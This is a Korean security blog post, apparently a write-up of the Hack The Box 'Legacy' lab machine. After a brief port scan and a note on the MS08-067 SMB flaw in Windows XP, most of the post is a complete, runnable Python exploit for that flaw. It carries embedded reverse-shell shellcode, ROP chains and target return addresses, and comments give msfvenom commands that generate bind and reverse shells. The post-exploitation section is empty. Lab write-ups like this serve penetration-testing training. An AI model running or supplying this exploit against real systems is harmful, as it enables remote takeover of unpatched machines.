외로운 Nova의 작업실
Report - HTB Legacy Report 본문
1. port scan result
| IP Address | Open Port |
| 10.10.10.4 | 135 |
| 139 | |
| 445 |
2. initial access - ms08_067 vulnerability
Vulnerability Explanation
:I scanned the port and the 445 port was running as SMB protocol. system os was window XP. window XP is subject to ms08_067 vulnerability. Attacker can use this vulnerability to cause arbitrary remote code excution and take complete control over the system
Vulnerability Fix : update latest operating system and use firewall for access control for 445 port
Severity : critical,
Steps to reproduce the attack : download ms08_067 exploit code in github and fix code according to the current situation and exploit
proof of concept code :
#!/usr/bin/env python
import struct
import time
import sys
from threading import Thread # Thread is imported incase you would like to modify
try:
from impacket import smb
from impacket import uuid
#from impacket.dcerpc import dcerpc
from impacket.dcerpc.v5 import transport
except ImportError:
print('Install the following library to make this script work')
print('Impacket : https://github.com/CoreSecurity/impacket.git')
print('PyCrypto : https://pypi.python.org/pypi/pycrypto')
sys.exit(1)
print ('#######################################################################')
print ('# MS08-067 Exploit')
print ('# This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).')
print ('# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi')
print ('#')
print ('# Mod in 2018 by Andy Acer')
print ('# - Added support for selecting a target port at the command line.')
print ('# - Changed library calls to allow for establishing a NetBIOS session for SMB transport')
print ('# - Changed shellcode handling to allow for variable length shellcode.')
print ('#######################################################################\n')
print ('''
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
''')
print('#######################################################################\n')
# ------------------------------------------------------------------------
# REPLACE THIS SHELLCODE with shellcode generated for your use
# Note that length checking logic follows this section, so there's no need to count bytes or bother with NOPS.
#
# Example msfvenom commands to generate shellcode:
# msfvenom -p windows/shell_bind_tcp RHOST=10.11.1.229 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# Reverse TCP to 192.168.119.204 port 62000:
shellcode=(
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xa7\xb8\x9b\xbb\x83\xee\xfc\xe2\xf4\x5b\x50\x19\xbb"
"\xa7\xb8\xfb\x32\x42\x89\x5b\xdf\x2c\xe8\xab\x30\xf5\xb4"
"\x10\xe9\xb3\x33\xe9\x93\xa8\x0f\xd1\x9d\x96\x47\x37\x87"
"\xc6\xc4\x99\x97\x87\x79\x54\xb6\xa6\x7f\x79\x49\xf5\xef"
"\x10\xe9\xb7\x33\xd1\x87\x2c\xf4\x8a\xc3\x44\xf0\x9a\x6a"
"\xf6\x33\xc2\x9b\xa6\x6b\x10\xf2\xbf\x5b\xa1\xf2\x2c\x8c"
"\x10\xba\x71\x89\x64\x17\x66\x77\x96\xba\x60\x80\x7b\xce"
"\x51\xbb\xe6\x43\x9c\xc5\xbf\xce\x43\xe0\x10\xe3\x83\xb9"
"\x48\xdd\x2c\xb4\xd0\x30\xff\xa4\x9a\x68\x2c\xbc\x10\xba"
"\x77\x31\xdf\x9f\x83\xe3\xc0\xda\xfe\xe2\xca\x44\x47\xe7"
"\xc4\xe1\x2c\xaa\x70\x36\xfa\xd0\xa8\x89\xa7\xb8\xf3\xcc"
"\xd4\x8a\xc4\xef\xcf\xf4\xec\x9d\xa0\x47\x4e\x03\x37\xb9"
"\x9b\xbb\x8e\x7c\xcf\xeb\xcf\x91\x1b\xd0\xa7\x47\x4e\xeb"
"\xf7\xe8\xcb\xfb\xf7\xf8\xcb\xd3\x4d\xb7\x44\x5b\x58\x6d"
"\x0c\xd1\xa2\xd0\x91\xb1\xa9\xbc\xf3\xb9\xa7\xb9\x20\x32"
"\x41\xd2\x8b\xed\xf0\xd0\x02\x1e\xd3\xd9\x64\x6e\x22\x78"
"\xef\xb7\x58\xf6\x93\xce\x4b\xd0\x6b\x0e\x05\xee\x64\x6e"
"\xcf\xdb\xf6\xdf\xa7\x31\x78\xec\xf0\xef\xaa\x4d\xcd\xaa"
"\xc2\xed\x45\x45\xfd\x7c\xe3\x9c\xa7\xba\xa6\x35\xdf\x9f"
"\xb7\x7e\x9b\xff\xf3\xe8\xcd\xed\xf1\xfe\xcd\xf5\xf1\xee"
"\xc8\xed\xcf\xc1\x57\x84\x21\x47\x4e\x32\x47\xf6\xcd\xfd"
"\x58\x88\xf3\xb3\x20\xa5\xfb\x44\x72\x03\x7b\xa6\x8d\xb2"
"\xf3\x1d\x32\x05\x06\x44\x72\x84\x9d\xc7\xad\x38\x60\x5b"
"\xd2\xbd\x20\xfc\xb4\xca\xf4\xd1\xa7\xeb\x64\x6e"
)
# ------------------------------------------------------------------------
# Gotta make No-Ops (NOPS) + shellcode = 410 bytes
num_nops = 410 - len(shellcode)
newshellcode = "\x90" * num_nops
newshellcode += shellcode # Add NOPS to the front
shellcode = newshellcode # Switcheroo with the newshellcode temp variable
#print "Shellcode length: %s\n\n" % len(shellcode)
nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
"A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01";
module_base = 0x6f880000
def generate_rop(rvas):
gadget1 = "\x90\x5a\x59\xc3"
gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
gadget3 = "\xcc\x90\xeb\x5a"
ret = struct.pack('<L', 0x00018000)
ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base)
ret += struct.pack('<L', 0x01040110)
ret += struct.pack('<L', 0x01010101)
ret += struct.pack('<L', 0x01010101)
ret += struct.pack('<L',
rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base)
ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
ret += gadget1
ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base)
ret += struct.pack('<L', rvas['jmp eax'] + module_base)
ret += gadget2[0]
ret += gadget2[1]
ret += struct.pack('<L', rvas[
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
ret += gadget2[2]
ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base)
ret += struct.pack('<L', rvas['jmp eax'] + module_base)
ret += gadget3
return ret
class SRVSVC_Exploit(Thread):
def __init__(self, target, os, port=445):
super(SRVSVC_Exploit, self).__init__()
# MODIFIED HERE
# Changed __port to port ... not sure if that does anything. I'm a newb.
self.port = port
self.target = target
self.os = os
def __DCEPacket(self):
if (self.os == '1'):
print('Windows XP SP0/SP1 Universal\n')
ret = "\x61\x13\x00\x01"
jumper = nonxjmper % (ret, ret)
elif (self.os == '2'):
print('Windows 2000 Universal\n')
ret = "\xb0\x1c\x1f\x00"
jumper = nonxjmper % (ret, ret)
elif (self.os == '3'):
print('Windows 2003 SP0 Universal\n')
ret = "\x9e\x12\x00\x01" # 0x01 00 12 9e
jumper = nonxjmper % (ret, ret)
elif (self.os == '4'):
print('Windows 2003 SP1 English\n')
ret_dec = "\x8c\x56\x90\x7c" # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
ret_pop = "\xf4\x7c\xa2\x7c" # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
jmp_esp = "\xd3\xfe\x86\x7c" # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
disable_nx = "\x13\xe4\x83\x7c" # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
jumper = disableNXjumper % (
ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
elif (self.os == '5'):
print('Windows XP SP3 French (NX)\n')
ret = "\x07\xf8\x5b\x59" # 0x59 5b f8 07
disable_nx = "\xc2\x17\x5c\x59" # 0x59 5c 17 c2
# the nonxjmper also work in this case.
jumper = nonxjmper % (disable_nx, ret)
elif (self.os == '6'):
print('Windows XP SP3 English (NX)\n')
ret = "\x07\xf8\x88\x6f" # 0x6f 88 f8 07
disable_nx = "\xc2\x17\x89\x6f" # 0x6f 89 17 c2
# the nonxjmper also work in this case.
jumper = nonxjmper % (disable_nx, ret)
elif (self.os == '7'):
print('Windows XP SP3 English (AlwaysOn NX)\n')
rvasets = {'call_HeapCreate': 0x21286, 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796, 'pop ecx / ret': 0x2e796 + 6,
'mov [eax], ecx / ret': 0xd296, 'jmp eax': 0x19c6f, 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56, 'mov [eax+0x10], ecx / ret': 0x10a56 + 6, 'add eax, 8 / ret': 0x29c64}
# the nonxjmper also work in this case.
jumper = generate_rop(rvasets) + "AB"
else:
print('Not supported OS version\n')
sys.exit(-1)
print('[-]Initiating connection')
# MORE MODIFICATIONS HERE #############################################################################################
if (self.port == '445'):
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
else:
# DCERPCTransportFactory doesn't call SMBTransport with necessary parameters. Calling directly here.
# *SMBSERVER is used to force the library to query the server for its NetBIOS name and use that to
# establish a NetBIOS Session. The NetBIOS session shows as NBSS in Wireshark.
self.__trans = transport.SMBTransport(remoteName='*SMBSERVER', remote_host='%s' % self.target, dstport = int(self.port), filename = '\\browser' )
self.__trans.connect()
print('[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(
('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
"\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
# NEW HOTNESS
# The Path Length and the "Actual Count" SMB parameter have to match. Path length in bytes
# is double the ActualCount field. MaxCount also seems to match. These fields in the SMB protocol
# store hex values in reverse byte order. So: 36 01 00 00 => 00 00 01 36 => 310. No idea why it's "doubled"
# from 310 to 620. 620 = 410 shellcode + extra stuff in the path.
MaxCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620.
Offset = "\x00\x00\x00\x00"
ActualCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620
self.__stub = server + MaxCount + Offset + ActualCount + \
path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
time.sleep(3)
print('Exploit finish\n')
if __name__ == '__main__':
try:
target = sys.argv[1]
os = sys.argv[2]
port = sys.argv[3]
except IndexError:
print('\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0])
print('Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445')
print('Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)')
print('Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal')
print('Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English')
print('Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)')
print('Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)')
print('Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)')
print('')
print('FYI: nmap has a good OS discovery script that pairs well with this exploit:')
print('nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1')
print('')
sys.exit(-1)
current = SRVSVC_Exploit(target, os, port)
current.start()
post-exploitation :
screenshot :
'Server Penetesting > Report' 카테고리의 다른 글
| Report - Nibbles Report (0) | 2023.04.23 |
|---|---|
| Report - HTB Lame Report (0) | 2023.04.20 |
| Report - HTB bashed Report (0) | 2023.04.17 |
| 리포트 템플릿 (0) | 2023.04.17 |
| Report - HTB Shocker Report (0) | 2023.04.11 |
'Server Penetesting/Report' Related Articles
more
Comments